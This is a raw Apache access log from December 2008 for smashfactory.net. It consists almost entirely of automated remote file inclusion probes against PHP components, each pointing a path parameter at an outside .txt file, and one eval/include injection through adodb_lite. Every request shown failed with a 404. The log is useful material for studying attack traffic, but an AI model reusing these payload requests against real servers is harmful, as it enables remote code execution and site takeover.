87.117.195.42 - - [03/Dec/2008:16:01:28 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:14:54 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
72.46.145.6 - - [03/Dec/2008:16:15:39 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.caraudiolinks.co.uk//assets/snippets/reflect/gif/vel.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:16:49 -0800] "GET /logs/access.log/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:16:50 -0800] "GET /include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:16:50 -0800] "GET /logs/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "smashfactory.net"
210.219.173.249 - - [03/Dec/2008:16:18:25 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
216.104.34.142 - - [03/Dec/2008:16:20:01 -0800] "GET /logs/access.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "smashfactory.net"
216.104.34.142 - - [03/Dec/2008:16:20:01 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "smashfactory.net"
216.104.34.142 - - [03/Dec/2008:16:20:01 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:20:17 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.smashfactory.net"
62.75.209.183 - - [03/Dec/2008:16:21:28 -0800] "GET /skin/zero_vote/error.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:21:34 -0800] "GET /logs/access_080927.log/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:21:34 -0800] "GET /include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.smashfactory.net"
81.169.143.242 - - [03/Dec/2008:16:21:35 -0800] "GET /logs/include/view.inc.php?site_path=http://tronador.ulagos.cl/cursosvirtuales/112/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.smashfactory.net"
207.126.62.105 - - [03/Dec/2008:16:22:55 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.yamuca.com//Social/pre_614/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:24:23 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:24:23 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
91.121.2.160 - - [03/Dec/2008:16:24:23 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:25:43 -0800] "GET /skin/zero_vote/login.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:26:07 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:26:07 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
74.55.93.138 - - [03/Dec/2008:16:26:07 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sukhman.net/articles//gif/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
74.55.13.210 - - [03/Dec/2008:16:26:25 -0800] "GET /skin/zero_vote/setup.php?dir=http://www.csctillay.fr/UserFiles/Image/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "smashfactory.net"
219.94.174.158 - - [03/Dec/2008:16:26:46 -0800] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
219.94.174.158 - - [03/Dec/2008:16:26:46 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
219.94.174.158 - - [03/Dec/2008:16:26:47 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
195.137.143.11 - - [03/Dec/2008:16:27:01 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
195.137.143.11 - - [03/Dec/2008:16:27:01 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
195.137.143.11 - - [03/Dec/2008:16:27:01 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
91.121.83.198 - - [03/Dec/2008:16:28:08 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
91.121.83.198 - - [03/Dec/2008:16:28:08 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://franza.altervista.org/php.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:30:03 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:30:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:30:05 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "smashfactory.net"
68.109.233.157 - - [03/Dec/2008:16:32:15 -0800] "GET /include/write.php?dir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
68.109.233.157 - - [03/Dec/2008:16:32:15 -0800] "GET /logs/access_080927.log//include/write.php?dir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
68.109.233.157 - - [03/Dec/2008:16:32:25 -0800] "GET /logs//include/write.php?dir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:33:07 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:33:07 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:33:07 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:33:16 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:33:16 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:33:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "smashfactory.net"
77.221.130.14 - - [03/Dec/2008:16:33:17 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:33:19 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "smashfactory.net"
216.117.175.247 - - [03/Dec/2008:16:33:19 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:24 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:24 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:24 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "smashfactory.net"
210.219.173.249 - - [03/Dec/2008:16:33:25 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
210.219.173.249 - - [03/Dec/2008:16:33:25 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
210.219.173.249 - - [03/Dec/2008:16:33:26 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:29 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:29 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:29 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:43 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:43 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:43 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:47 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:33:47 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:00 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:00 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:05 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:05 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:08 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:14 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:14 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:14 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:30 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:30 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:30 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:34:33 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:34:47 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:34:47 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
85.236.53.4 - - [03/Dec/2008:16:34:47 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:18 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:18 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:18 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.smashfactory.net"
210.219.173.249 - - [03/Dec/2008:16:35:28 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mp3goog.com//upgrade/includes/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:28 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:28 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:28 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:55 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:55 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:55 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:58 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:58 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:35:58 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:03 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:03 -0800] "GET /logs/access_080927.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
72.52.212.40 - - [03/Dec/2008:16:36:03 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.smashfactory.net"
